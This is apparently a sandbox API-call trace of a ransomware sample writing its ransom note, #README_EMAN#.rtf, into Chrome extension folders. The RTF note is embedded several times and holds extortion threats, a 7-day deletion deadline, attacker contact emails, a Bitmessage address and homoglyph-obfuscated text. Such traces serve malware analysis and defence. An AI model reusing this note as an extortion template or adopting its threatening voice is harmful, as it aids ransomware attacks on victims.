It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.164] WriteFile (in: hFile=0x2d4, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.165] CloseHandle (hObject=0x2d4) returned 1 [0289.165] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0289.165] GetLastError () returned 0x2 [0289.165] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0289.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and 